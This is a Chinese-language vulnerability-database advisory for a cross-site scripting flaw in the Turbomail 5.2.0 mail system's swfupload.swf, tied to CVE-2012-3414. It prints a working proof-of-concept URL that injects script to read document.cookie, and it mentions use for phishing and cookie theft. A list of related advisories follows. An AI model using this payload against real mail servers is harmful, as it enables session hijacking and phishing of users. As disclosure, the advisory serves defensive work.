Lucene search
RootSSV:95642HistoryDec 24, 2014 - 12:00 a.m.
Turbomail邮件系统XSS-1
2014-12-2400:00:00
Root
www.seebug.org
205
0.034 Low
EPSS
Percentile
90.4%
简要描述:
Turbomail邮件系统最新版某处存在xss漏洞,可以用来钓鱼,获取cookie等
详细说明:
版本:windows server下搭建的最新版5.2.0
漏洞文件为
C:\turbomail\web\webapps\ROOT\enterprise\swfupload\swfupload.swf
此版本存在xss缺陷,参考CVE-2012-3414
http://mail.fuck.com:8080/enterprise/swfupload/swfupload/swfupload.swf?movieName="]);}catch%28e%29{}if%28!self.a%29self.a=!alert%28document.cookie%29;//
漏洞证明:
如上
Related
zdt
zdt
Dotclear XSS Vulnerabilities
2013-04-14 00:00:00
Wordpress Plugin (wp-e-commerce v3.8.9.5) Multiple Vulnerabilities
2014-01-23 00:00:00
cve
cve
securityvulns
securityvulns
CS and XSS vulnerabilities in SWFUpload
2013-03-11 00:00:00
XSS vulnerability in swfupload in WordPress
2012-11-18 00:00:00
XSS and CS vulnerabilities in Dotclear
2013-05-06 00:00:00
threatpost
threatpost
Issue with SWFUploader Could Lead to XSS Vulnerabilities, Content Spoofing
2013-03-12 19:10:36
Yahoo Mail Breach Linked to Old WordPress Vulnerability
2013-02-01 03:42:54
packetstorm
packetstorm
SWF Upload Cross Site Scripting
2012-11-13 00:00:00
WordPress 3.3.1 swfupload.swf Cross Site Scripting
2012-11-09 00:00:00
Dotclear 2.4.4 Cross Site Scripting / Content Spoofing
2013-04-13 00:00:00
openvas
openvas
FreeBSD Ports: typo3
2012-08-10 00:00:00
TYPO3 SWFUpload movieName Cross Site Scripting Vulnerability
2014-01-02 00:00:00
prion
prion
Cross site scripting
2013-07-19 14:36:00
Cross site scripting
2012-04-21 23:55:00
Design/Logic Flaw
2022-06-30 13:15:00
typo3
typo3
Cross-Site Scripting Vulnerability in TYPO3 Core
2012-07-04 00:00:00
patchstack
patchstack
WordPress SWFUpload Plugin <= 2.2.0.1 - XSS #1
2012-06-14 00:00:00
ubuntucve
ubuntucve
CVE-2012-3414
2013-07-19 00:00:00
CVE-2012-2399
2012-04-21 00:00:00
debiancve
debiancve
CVE-2012-3414
2013-07-19 14:36:00
CVE-2012-2399
2012-04-21 23:55:00
nessus
nessus
WordPress < 3.3.2 Multiple Vulnerabilities
2012-05-09 00:00:00